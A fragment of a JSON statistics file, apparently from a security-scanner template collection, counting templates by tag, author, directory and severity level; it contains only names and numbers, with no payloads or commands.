hannel","count":1},{"name":"cybrotech","count":1},{"name":"ccm","count":1},{"name":"discogs","count":1},{"name":"ipdata","count":1},{"name":"ip2whois","count":1},{"name":"misp","count":1},{"name":"mybuildercom","count":1},{"name":"impala","count":1},{"name":"aveva","count":1},{"name":"3com","count":1},{"name":"smarterstats","count":1},{"name":"tunefind","count":1},{"name":"rsyncd","count":1},{"name":"photoblocks-gallery","count":1},{"name":"vite","count":1},{"name":"pornhub-porn-stars","count":1},{"name":"lemlist","count":1},{"name":"huijietong","count":1},{"name":"portrait-archiv-shop","count":1},{"name":"cube","count":1},{"name":"zatrybipl","count":1},{"name":"umami","count":1},{"name":"atvise","count":1},{"name":"smokeping","count":1},{"name":"love-ru","count":1},{"name":"orcus","count":1},{"name":"booth","count":1},{"name":"phoenix","count":1},{"name":"vimeo","count":1},{"name":"librenms","count":1},{"name":"geniusocean","count":1},{"name":"locations","count":1},{"name":"insight","count":1},{"name":"wpify","count":1},{"name":"maccmsv10","count":1},{"name":"scratch","count":1},{"name":"geth","count":1},{"name":"lucy","count":1},{"name":"onkyo","count":1},{"name":"wp-helper-lite","count":1},{"name":"jsapi","count":1},{"name":"tradingview","count":1},{"name":"errorpage","count":1},{"name":"coinapi","count":1},{"name":"coinlayer","count":1},{"name":"inaturalist","count":1},{"name":"nweb2fax","count":1},{"name":"brightsign","count":1},{"name":"opentouch","count":1},{"name":"posthog","count":1},{"name":"axiom","count":1},{"name":"commerce","count":1},{"name":"mastodononline","count":1},{"name":"wpcentral","count":1},{"name":"esafenet","count":1},{"name":"autonomy","count":1},{"name":"twpro","count":1},{"name":"jinfornet","count":1},{"name":"stackposts","count":1},{"name":"eyelock","count":1},{"name":"phalcon","count":1},{"name":"cvnd2018","count":1},{"name":"web-dispatcher","count":1},{"name":"directions","count":1},{"name":"satis","count":1},{"name":"mastodon-tflnetpl","count":1},{"name":"rhymix","count":1},{"name":"anobii","count":1},{"name":"eap","count":1},{"name":"persis","count":1},{"name":"esocks5","count":1},{"name":"nerdgraph","count":1},{"name":"dnssec","count":1},{"name":"zebra","count":1},{"name":"superstorefinder-wp","count":1},{"name":"sage","count":1},{"name":"wego","count":1},{"name":"ptr","count":1},{"name":"statistics","count":1},{"name":"fontawesome","count":1},{"name":"noptin","count":1},{"name":"knowage","count":1},{"name":"kaes","count":1},{"name":"geolocation","count":1},{"name":"bws","count":1},{"name":"currencyscoop","count":1},{"name":"domino","count":1},{"name":"semaphore","count":1},{"name":"spidercontrol","count":1},{"name":"wordpress-support","count":1},{"name":"zmarsacom","count":1},{"name":"logontracer","count":1},{"name":"fuddorum","count":1},{"name":"iq-block-country","count":1},{"name":"qualcomm","count":1},{"name":"hunter","count":1},{"name":"chopslider","count":1},{"name":"phpbb","count":1},{"name":"wishlistr","count":1},{"name":"impresspages","count":1},{"name":"affiliates-manager","count":1},{"name":"void","count":1},{"name":"secmail","count":1},{"name":"adult-forum","count":1},{"name":"aryanic","count":1},{"name":"nextgen","count":1},{"name":"weasyl","count":1},{"name":"mismatched","count":1},{"name":"ilo4","count":1},{"name":"employment","count":1},{"name":"ocomon","count":1},{"name":"phpminiadmin","count":1},{"name":"imagefap","count":1},{"name":"insanejournal","count":1},{"name":"mcname-minecraft","count":1},{"name":"mongoose","count":1},{"name":"nocodb","count":1},{"name":"c99","count":1},{"name":"easyappointments","count":1},{"name":"demotywatory","count":1},{"name":"scimono","count":1},{"name":"iclock","count":1},{"name":"scrapingdog","count":1},{"name":"extremenetworks","count":1},{"name":"airline-pilot-life","count":1},{"name":"launchdarkly","count":1},{"name":"speakout-email-petitions","count":1},{"name":"celery","count":1},{"name":"cvent","count":1},{"name":"ricoh","count":1},{"name":"maipu","count":1}],"authors":[{"name":"dhiyaneshdk","count":1109},{"name":"dwisiswant0","count":800},{"name":"daffainfo","count":787},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":307},{"name":"ritikchaddha","count":293},{"name":"pdteam","count":283},{"name":"ricardomaia","count":229},{"name":"geeknik","count":221},{"name":"theamanrawat","count":221},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":163},{"name":"gy741","count":154},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"pdresearch","count":62},{"name":"righettod","count":59},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"iamnoooob","count":52},{"name":"philippedelteil","count":46},{"name":"rootxharsh","count":44},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"c-sh0","count":35},{"name":"johnk3r","count":34},{"name":"j4vaovo","count":32},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"ice3man","count":28},{"name":"pwnhxl","count":25},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"harsh","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"ctflearner","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"parthmalhotra","count":17},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"shaikhyaser","count":16},{"name":"rxerium","count":16},{"name":"0xpugazh","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"unapibageek","count":15},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"melbadry9","count":13},{"name":"nullfuzz","count":13},{"name":"theabhinavgaur","count":13},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"co5mos","count":10},{"name":"logicalhunter","count":10},{"name":"random_robbie","count":10},{"name":"0x240x23elu","count":10},{"name":"nadino","count":10},{"name":"olearycrew","count":9},{"name":"oppsec","count":9},{"name":"fabaff","count":9},{"name":"emadshanab","count":9},{"name":"momika233","count":9},{"name":"kazet","count":8},{"name":"mastercho","count":8},{"name":"noraj","count":8},{"name":"veshraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"irshad ahamed","count":8},{"name":"that_juan_","count":8},{"name":"_0xf4n9x_","count":8},{"name":"techryptic (@tech)","count":7},{"name":"tarunkoyalwar","count":7},{"name":"bhutch","count":7},{"name":"its0x08","count":7},{"name":"leovalcante","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"nodauf","count":7},{"name":"amit-jd","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"divya_mudgal","count":7},{"name":"huta0","count":7},{"name":"caspergn","count":7},{"name":"adamcrosser","count":7},{"name":"devang-solanki","count":6},{"name":"clem9669","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"ja1sh","count":6},{"name":"pentest_swissky","count":6},{"name":"evan rubinstein","count":6},{"name":"megamansec","count":6},{"name":"imnightmaree","count":6},{"name":"gitlab red team","count":6},{"name":"xelkomy","count":6},{"name":"justaacat","count":6},{"name":"pathtaga","count":6},{"name":"puzzlepeaches","count":6},{"name":"shine","count":5},{"name":"yanyun","count":5},{"name":"andreluna","count":5},{"name":"ganofins","count":5},{"name":"defr0ggy","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"mr-xn","count":5},{"name":"prajiteshsingh","count":5},{"name":"powerexploit","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"r12w4n","count":5},{"name":"s0obi","count":5},{"name":"dadevel","count":4},{"name":"lum8rjack","count":4},{"name":"tanq16","count":4},{"name":"3th1c_yuk1","count":4},{"name":"e_schultze_","count":4},{"name":"ggranjus","count":4},{"name":"arm!tage","count":4},{"name":"shankar acharya","count":4},{"name":"ice3man543","count":4},{"name":"dolev farhi","count":4},{"name":"nybble04","count":4},{"name":"incogbyte","count":4},{"name":"scent2d","count":4},{"name":"r3naissance","count":4},{"name":"h1ei1","count":4},{"name":"wisnupramoedya","count":4},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"0w4ys","count":3},{"name":"taielab","count":3},{"name":"farish","count":3},{"name":"e1a","count":3},{"name":"matt galligan","count":3},{"name":"vsh00t","count":3},{"name":"badboycxcc","count":3},{"name":"k0pak4","count":3},{"name":"mavericknerd","count":3},{"name":"atomiczsec","count":3},{"name":"thomas_from_offensity","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"ambassify","count":3},{"name":"canberbamber","count":3},{"name":"johnjhacking","count":3},{"name":"_generic_human_","count":3},{"name":"arcc","count":3},{"name":"splint3r7","count":3},{"name":"shifacyclewala","count":3},{"name":"lucasljm2001","count":3},{"name":"swissky","count":3},{"name":"huowuzhao","count":3},{"name":"vagnerd","count":3},{"name":"parth","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"z3bd","count":3},{"name":"ekrause","count":3},{"name":"davidmckennirey","count":3},{"name":"impramodsargar","count":3},{"name":"evergreencartoons","count":3},{"name":"ph33r","count":3},{"name":"randomrobbie","count":3},{"name":"m4lwhere","count":3},{"name":"king-alexander","count":3},{"name":"dr0pd34d","count":3},{"name":"true13","count":3},{"name":"bernardofsr","count":3},{"name":"sushantkamble","count":3},{"name":"aringo","count":3},{"name":"xianke","count":3},{"name":"fxploit","count":3},{"name":"binaryfigments","count":3},{"name":"andydoering","count":3},{"name":"lark-lab","count":3},{"name":"cheesymoon","count":3},{"name":"alifathi-h1","count":3},{"name":"lucky0x0d","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"me9187","count":3},{"name":"whoever","count":3},{"name":"heeress","count":3},{"name":"imjust0","count":3},{"name":"0xelkomy","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"codexlynx","count":2},{"name":"mohammedsaneem","count":2},{"name":"amsda","count":2},{"name":"x1m_martijn","count":2},{"name":"0xsapra","count":2},{"name":"c3l3si4n","count":2},{"name":"florianmaak","count":2},{"name":"dbrwsky","count":2},{"name":"clarkvoss","count":2},{"name":"pxmme1337","count":2},{"name":"manas_harsh","count":2},{"name":"0xcrypto","count":2},{"name":"g4l1t0","count":2},{"name":"koti2","count":2},{"name":"ehsahil","count":2},{"name":"nuk3s3c","count":2},{"name":"joeldeleep","count":2},{"name":"martincodes-de","count":2},{"name":"paradessia","count":2},{"name":"luci","count":2},{"name":"v0idc0de","count":2},{"name":"0xsmiley","count":2},{"name":"sbani","count":2},{"name":"bananabr","count":2},{"name":"mzack9999","count":2},{"name":"coldfish","count":2},{"name":"j3ssie","count":2},{"name":"sascha brendel","count":2},{"name":"zy9ard3","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bing0o","count":2},{"name":"sinkettu","count":2},{"name":"supras","count":2},{"name":"d4vy","count":2},{"name":"bp0lr","count":2},{"name":"gtrrnr","count":2},{"name":"convisoappsec","count":2},{"name":"geekby","count":2},{"name":"brucelsone","count":2},{"name":"smaranchand","count":2},{"name":"uomogrande","count":2},{"name":"gevakun","count":2},{"name":"k11h-de","count":2},{"name":"hackerarpan","count":2},{"name":"gal nagli","count":2},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"joshua rogers","count":2},{"name":"joshlarsen","count":2},{"name":"shelled","count":2},{"name":"bsysop","count":2},{"name":"h0j3n","count":2},{"name":"danielmofer","count":2},{"name":"wa1tf0rme","count":2},{"name":"ayadim","count":2},{"name":"rafaelwdornelas","count":2},{"name":"streetofhackerr007","count":2},{"name":"korteke","count":2},{"name":"dheerajmadhukar","count":2},{"name":"8arthur","count":2},{"name":"notnotnotveg","count":2},{"name":"dahse89","count":2},{"name":"ajaysenr","count":2},{"name":"moritz nentwig","count":2},{"name":"myztique","count":2},{"name":"nvn1729","count":2},{"name":"redteambrasil","count":2},{"name":"randomdhiraj","count":2},{"name":"thardt-praetorian","count":2},{"name":"paperpen","count":2},{"name":"z0ne","count":2},{"name":"n-thumann","count":2},{"name":"supr4s","count":2},{"name":"y4er","count":2},{"name":"0xnirvana","count":2},{"name":"6mile","count":2},{"name":"w4cky_","count":2},{"name":"kiblyn11","count":2},{"name":"brenocss","count":2},{"name":"hetroublemakr","count":2},{"name":"sy3omda","count":2},{"name":"github.com/its0x08","count":2},{"name":"afaq","count":2},{"name":"ep1csage","count":2},{"name":"parzival","count":2},{"name":"666asd","count":2},{"name":"mrharshvardhan","count":2},{"name":"thezakman","count":2},{"name":"lotusdll","count":2},{"name":"foulenzer","count":2},{"name":"raesene","count":2},{"name":"thevillagehacker","count":2},{"name":"cocxanh","count":2},{"name":"kre80r","count":2},{"name":"0xrudra","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"cckuakilong","count":2},{"name":"kishore-hariram","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"ree4pwn","count":2},{"name":"dogancanbakir","count":2},{"name":"maximus decimus","count":2},{"name":"professorabhay","count":1},{"name":"patrick pirker","count":1},{"name":"alevsk","count":1},{"name":"brianlam38","count":1},{"name":"technicaljunkie","count":1},{"name":"shankaracharya","count":1},{"name":"0ut0fb4nd","count":1},{"name":"screamy","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"udyz","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"retr02332","count":1},{"name":"ok_bye_now","count":1},{"name":"hateshape","count":1},{"name":"_c0wb0y_","count":1},{"name":"alex","count":1},{"name":"arliya","count":1},{"name":"barthy.koeln","count":1},{"name":"0xprial","count":1},{"name":"nielsing","count":1},{"name":"ramondunker","count":1},{"name":"zn9988","count":1},{"name":"thabisocn","count":1},{"name":"luqman","count":1},{"name":"xc1ym","count":1},{"name":"0xtavian","count":1},{"name":"kiransau","count":1},{"name":"jaimin gondaliya","count":1},{"name":"iampritam","count":1},{"name":"pdp","count":1},{"name":"ringo","count":1},{"name":"liquidsec","count":1},{"name":"y0no","count":1},{"name":"myst7ic","count":1},{"name":"furkansenan","count":1},{"name":"iphantasmic","count":1},{"name":"chesterblue","count":1},{"name":"xstp","count":1},{"name":"rumble773","count":1},{"name":"nerrorsec","count":1},{"name":"httpvoid","count":1},{"name":"mubassirpatel","count":1},{"name":"tehtbl","count":1},{"name":"berkdusunur","count":1},{"name":"patralos","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"andysvints","count":1},{"name":"orpheus","count":1},{"name":"ahmetpergamum","count":1},{"name":"cravaterouge","count":1},{"name":"revblock","count":1},{"name":"charanrayudu","count":1},{"name":"rotembar","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"hakluke","count":1},{"name":"narluin","count":1},{"name":"mantissts","count":1},{"name":"djoevanka","count":1},{"name":"alexrydzak","count":1},{"name":"micha3lb3n","count":1},{"name":"shockwave","count":1},{"name":"0xh7ml","count":1},{"name":"kchason","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"therealtoastycat","count":1},{"name":"akash.c","count":1},{"name":"ndmalc","count":1},{"name":"amirmsafari","count":1},{"name":"kiks7","count":1},{"name":"aresx","count":1},{"name":"clment cruchet","count":1},{"name":"millermedia","count":1},{"name":"k3rwin","count":1},{"name":"harshinsecurity","count":1},{"name":"lethargynavigator","count":1},{"name":"am0nt31r0","count":1},{"name":"pphuahua","count":1},{"name":"sec_hawk","count":1},{"name":"furkansayim","count":1},{"name":"arr0way","count":1},{"name":"houdinis","count":1},{"name":"lingtren","count":1},{"name":"godfatherorwa","count":1},{"name":"unp4ck","count":1},{"name":"ramkrishna sawant","count":1},{"name":"xcapri","count":1},{"name":"momen eldawakhly","count":1},{"name":"lark lab","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"0xteles","count":1},{"name":"pudsec","count":1},{"name":"adamparsons","count":1},{"name":"undefl0w","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"evan rubinstien","count":1},{"name":"d0rkerdevil","count":1},{"name":"marcio mendes","count":1},{"name":"mihhailsokolov","count":1},{"name":"qlkwej","count":1},{"name":"andirrahmani1","count":1},{"name":"piyushchhiroliya","count":1},{"name":"th3r4id","count":1},{"name":"sorrowx3","count":1},{"name":"dievus","count":1},{"name":"jbaines-r7","count":1},{"name":"hanlaomo","count":1},{"name":"michael wedl","count":1},{"name":"jcockhren","count":1},{"name":"adilsoybali","count":1},{"name":"regala_","count":1},{"name":"aravind","count":1},{"name":"exid","count":1},{"name":"toufik-airane","count":1},{"name":"aaronchen0","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kurohost","count":1},{"name":"2rs3c","count":1},{"name":"realexp3rt","count":1},{"name":"wlayzz","count":1},{"name":"blckraven","count":1},{"name":"w0tx","count":1},{"name":"exceed","count":1},{"name":"nobody","count":1},{"name":"ahmed sherif","count":1},{"name":"pussycat0","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"bad5ect0r","count":1},{"name":"guax1","count":1},{"name":"zsusac","count":1},{"name":"dwbzn","count":1},{"name":"galoget","count":1},{"name":"evolutionsec","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"arqsz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"th3.d1p4k","count":1},{"name":"herry","count":1},{"name":"calumjelrick","count":1},{"name":"flag007","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"arall","count":1},{"name":"prettyboyaaditya","count":1},{"name":"ola456","count":1},{"name":"rodnt","count":1},{"name":"juicypotato1","count":1},{"name":"yavolo","count":1},{"name":"_darrenmartyn","count":1},{"name":"sinsinology","count":1},{"name":"failopen","count":1},{"name":"spac3wh1te","count":1},{"name":"remonsec","count":1},{"name":"davidfegyver","count":1},{"name":"danfaizer","count":1},{"name":"natto97","count":1},{"name":"tirtha","count":1},{"name":"jaskaran","count":1},{"name":"hardik-rathod","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"caon","count":1},{"name":"higor melgaço","count":1},{"name":"hotpot","count":1},{"name":"abbas.heybati","count":1},{"name":"pry0cc","count":1},{"name":"bjxsec","count":1},{"name":"shifacyclewla","count":1},{"name":"pascalheidmann","count":1},{"name":"un-fmunozs","count":1},{"name":"axrk","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"dali","count":1},{"name":"ldionmarcil","count":1},{"name":"absshax","count":1},{"name":"p-l-","count":1},{"name":"pjborah","count":1},{"name":"0xrod","count":1},{"name":"whynotke","count":1},{"name":"dale clarke","count":1},{"name":"unkl4b","count":1},{"name":"justmumu","count":1},{"name":"bjhulst","count":1},{"name":"compr00t","count":1},{"name":"naglis","count":1},{"name":"jeya seelan","count":1},{"name":"colbyjack1134","count":1},{"name":"tirtha_mandal","count":1},{"name":"shivampand3y","count":1},{"name":"erikowen","count":1},{"name":"ayadi","count":1},{"name":"thelicato","count":1},{"name":"omarkurt","count":1},{"name":"youngpope","count":1},{"name":"hlop","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"elouhi","count":1},{"name":"dk999","count":1},{"name":"numan türle","count":1},{"name":"co0nan","count":1},{"name":"gboddin","count":1},{"name":"dmartyn","count":1},{"name":"nagli","count":1},{"name":"manuelbua","count":1},{"name":"yashgoti","count":1},{"name":"luskabol","count":1},{"name":"lixts","count":1},{"name":"palanichamy_perumal","count":1},{"name":"elitebaz","count":1},{"name":"francescocarlucci","count":1},{"name":"cookiehanhoan","count":1},{"name":"hazana","count":1},{"name":"pepitoh","count":1},{"name":"dhiyaneshdki","count":1},{"name":"fpatrik","count":1},{"name":"petruknisme","count":1},{"name":"noah @thesubtlety","count":1},{"name":"jrolf","count":1},{"name":"sospiro","count":1},{"name":"ofjaaah","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"brabbit10","count":1},{"name":"kaizensecurity","count":1},{"name":"jna1","count":1},{"name":"aayush vishnoi","count":1},{"name":"skylark-lab","count":1},{"name":"lamscun","count":1},{"name":"intx0x80","count":1},{"name":"yashanand155","count":1},{"name":"r3nz0","count":1},{"name":"af001","count":1},{"name":"kabirsuda","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"secthebit","count":1},{"name":"b0yd","count":1},{"name":"s1r1u5_","count":1},{"name":"thirukrishnan","count":1},{"name":"aringo-bf","count":1},{"name":"bartu utku sarp","count":1},{"name":"hexcat","count":1},{"name":"jbertman","count":1},{"name":"manasmbellani","count":1},{"name":"hakimkt","count":1},{"name":"shiar","count":1},{"name":"ptonewreckin","count":1},{"name":"mrcl0wnlab","count":1},{"name":"drfabiocastro","count":1},{"name":"luqmaan hadia","count":1},{"name":"husain","count":1},{"name":"sickwell","count":1},{"name":"xshuden","count":1},{"name":"fq_hsu","count":1},{"name":"elder tao","count":1},{"name":"ynnirc","count":1},{"name":"1nf1n7y","count":1},{"name":"unknown","count":1},{"name":"rivalsec","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"adnanekhan","count":1},{"name":"pratik khalane","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"danigoland","count":1},{"name":"mr. bobo hp","count":1},{"name":"vinit989","count":1},{"name":"8authur","count":1},{"name":"freakyclown","count":1},{"name":"amanrawat","count":1},{"name":"jonathanwalker","count":1},{"name":"daviey","count":1},{"name":"ransomsec","count":1},{"name":"fmunozs","count":1},{"name":"tangxiaofeng7","count":1},{"name":"sttlr","count":1},{"name":"qianbenhyu","count":1},{"name":"philippdelteil","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mayankpandey01","count":1},{"name":"couskito","count":1},{"name":"mah3sec_","count":1},{"name":"booboohq","count":1},{"name":"irshadahamed","count":1},{"name":"oscarintherocks","count":1},{"name":"borna nematzadeh","count":1},{"name":"ruppde","count":1},{"name":"mass0ma","count":1},{"name":"mabdullah22","count":1},{"name":"official_blackhat13","count":1},{"name":"alperenkesk","count":1},{"name":"keni0k","count":1},{"name":"breno_css","count":1},{"name":"ooooooo_q","count":1},{"name":"izn0u","count":1},{"name":"shiva (strobes security)","count":1},{"name":"pbuff07","count":1},{"name":"j33n1k4","count":1},{"name":"arjunchandarana","count":1},{"name":"kresec","count":1},{"name":"c4sper0","count":1},{"name":"rojanrijal","count":1},{"name":"knassar702","count":1},{"name":"aron molnar","count":1},{"name":"elmahdi","count":1},{"name":"rotemreiss","count":1},{"name":"dorkerdevil","count":1},{"name":"mbmy","count":1},{"name":"sshell","count":1},{"name":"matt miller","count":1},{"name":"zandros0","count":1},{"name":"anon-artist","count":1},{"name":"push4d","count":1},{"name":"lady_bug","count":1},{"name":"none","count":1},{"name":"chetgan","count":1},{"name":"queencitycyber","count":1},{"name":"5up3r541y4n","count":1},{"name":"viniciuspereiras","count":1},{"name":"shreyapohekar","count":1},{"name":"noamrathaus","count":1},{"name":"petergrifin","count":1},{"name":"sicksec","count":1},{"name":"igibanez","count":1},{"name":"jas37","count":1},{"name":"juliosmelo","count":1},{"name":"kareemse1im","count":1},{"name":"kagamigawa","count":1},{"name":"win3zz","count":1},{"name":"geraldino2","count":1},{"name":"schniggie","count":1},{"name":"gpiechnik2","count":1},{"name":"retr0","count":1},{"name":"viondexd","count":1},{"name":"dabla","count":1},{"name":"miroslavsotak","count":1},{"name":"b0rn2r00t","count":1},{"name":"tea","count":1},{"name":"marcos_iaf","count":1},{"name":"xeldax","count":1},{"name":"lrtk-coder","count":1},{"name":"imhunterand","count":1},{"name":"sak1","count":1},{"name":"phyr3wall","count":1},{"name":"rschio","count":1},{"name":"carrot2","count":1},{"name":"flx","count":1},{"name":"bywalks","count":1},{"name":"ipanda","count":1},{"name":"s1r1us","count":1},{"name":"0xd0ff9","count":1},{"name":"topscoder","count":1},{"name":"droberson","count":1},{"name":"0xceeb","count":1},{"name":"jiheon-dev","count":1},{"name":"ilovebinbash","count":1},{"name":"ling","count":1},{"name":"zeyad azima","count":1},{"name":"adrianmf","count":1},{"name":"jeya.seelan","count":1},{"name":"willd96","count":1},{"name":"thebinitghimire","count":1},{"name":"amnotacat","count":1},{"name":"noobexploiter","count":1},{"name":"sherlocksecurity","count":1},{"name":"joaonevess","count":1},{"name":"_harleo","count":1},{"name":"deena","count":1},{"name":"zhenwarx","count":1},{"name":"cbadke","count":1},{"name":"makyotox","count":1},{"name":"aaban solutions","count":1},{"name":"salts","count":1},{"name":"kailashbohara","count":1},{"name":"jc175","count":1},{"name":"hczdmr","count":1},{"name":"fopina","count":1},{"name":"metascan","count":1},{"name":"rubina119","count":1},{"name":"osamahamad","count":1},{"name":"mesaglio","count":1},{"name":"vikas kundu","count":1},{"name":"bughuntersurya","count":1},{"name":"bugvsme","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"yusakie","count":1},{"name":"jteles","count":1},{"name":"miryangjung","count":1},{"name":"nytr0gen","count":1},{"name":"esonhugh","count":1},{"name":"soyelmago","count":1},{"name":"h4kux","count":1},{"name":"open-sec","count":1},{"name":"becivells","count":1},{"name":"paper-pen","count":1},{"name":"yuansec","count":1},{"name":"act1on3","count":1},{"name":"0h1in9e","count":1},{"name":"shelld3v","count":1},{"name":"chron0x","count":1},{"name":"akokonunes","count":1},{"name":"erethon","count":1},{"name":"carlosvieira","count":1},{"name":"ledoubletake","count":1},{"name":"b4uh0lz","count":1},{"name":"apt-mirror","count":1},{"name":"x6263","count":1},{"name":"akshansh","count":1},{"name":"duty_1g","count":1},{"name":"opencirt","count":1},{"name":"nuts7","count":1},{"name":"allenwest24","count":1},{"name":"ph33rr","count":1},{"name":"mhdsamx","count":1},{"name":"mukundbhuva","count":1},{"name":"yaser_s","count":1},{"name":"f1she3","count":1},{"name":"kr1shna4garwal","count":1},{"name":"majidmc2","count":1},{"name":"vzamanillo","count":1},{"name":"zinminphy0","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"udinchan","count":1},{"name":"exploitation","count":1},{"name":"tim_koopmans","count":1},{"name":"infosecsanyam","count":1},{"name":"notwhy","count":1},{"name":"0xceba","count":1},{"name":"notsoevilweasel","count":1},{"name":"wabafet","count":1},{"name":"stupidfish","count":1},{"name":"omarjezi","count":1},{"name":"daffianfo","count":1},{"name":"affix","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1}],"directory":[{"name":"http","count":6856},{"name":"file","count":312},{"name":"workflows","count":191},{"name":"network","count":133},{"name":"ssl","count":27},{"name":"javascript","count":20},{"name":"dns","count":17},{"name":"headless","count":10},{"name":"code","count":2},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3326},{"name":"high","count":1439},{"name":"medium","count":1429},{"name":"critical","count":906},{"name":"low","count":245},{"name":"unknown","count":32}],"types":[{"name":"file","count":312},{"name":"dns","count":18}]} +{"tags":[{"name":"cve","count":2296},{"name":"panel","count":1038},{"name":"wordpress","count":938},{"name":"xss","count":848},{"name":"exposure","count":844},{"name":"wp-plugin","count":812},{"name":"osint","count":677},{"name":"tech","count":649},{"name":"lfi","count":619},{"name":"edb","count":598},{"name":"misconfig","count":572},{"name":"rce","count":547},{"name":"packetstorm","count":510},{"name":"cve2021","count":474},{"name":"wpscan","count":468},{"name":"cve2022","count":459},{"name":"wp","count":392},{"name":"unauth","count":352},{"name":"authenticated","count":326},{"name":"file","count":321},{"name":"cve2023","count":313},{"name":"sqli","count":297},{"name":"intrusive","count":276},{"name":"cve2020","count":254},{"name":"kev","count":253},{"name":"token-spray","count":242},{"name":"top-200","count":215},{"name":"config","count":215},{"name":"osint-social","count":210},{"name":"oast","count":208},{"name":"","count":195},{"name":"token","count":194},{"name":"login","count":188},{"name":"default-login","count":188},{"name":"detect","count":171},{"name":"apache","count":169},{"name":"iot","count":164},{"name":"cve2018","count":160},{"name":"cve2019","count":157},{"name":"joomla","count":146},{"name":"malware","count":139},{"name":"network","count":139},{"name":"redirect","count":129},{"name":"auth-bypass","count":114},{"name":"cve2010","count":112},{"name":"files","count":111},{"name":"cve2017","count":109},{"name":"ssrf","count":107},{"name":"cms","count":107},{"name":"router","count":105},{"name":"install","count":101},{"name":"top-100","count":100},{"name":"disclosure","count":87},{"name":"devops","count":86},{"name":"seclists","count":75},{"name":"takeover","count":75},{"name":"fileupload","count":71},{"name":"oracle","count":70},{"name":"oss","count":66},{"name":"cisco","count":62},{"name":"huntr","count":59},{"name":"adobe","count":57},{"name":"cve2015","count":56},{"name":"atlassian","count":56},{"name":"cve2016","count":55},{"name":"google","count":54},{"name":"vmware","count":54},{"name":"tokens","count":52},{"name":"ir","count":50},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"log4j","count":46},{"name":"osint-gaming","count":45},{"name":"hackerone","count":44},{"name":"debug","count":44},{"name":"vulhub","count":44},{"name":"aem","count":44},{"name":"cve2014","count":43},{"name":"jndi","count":43},{"name":"c2","count":43},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"osint-hobby","count":42},{"name":"traversal","count":41},{"name":"generic","count":41},{"name":"oa","count":39},{"name":"aws","count":39},{"name":"springboot","count":39},{"name":"deserialization","count":39},{"name":"cnvd","count":37},{"name":"jira","count":37},{"name":"kubernetes","count":37},{"name":"listing","count":37},{"name":"misc","count":35},{"name":"injection","count":35},{"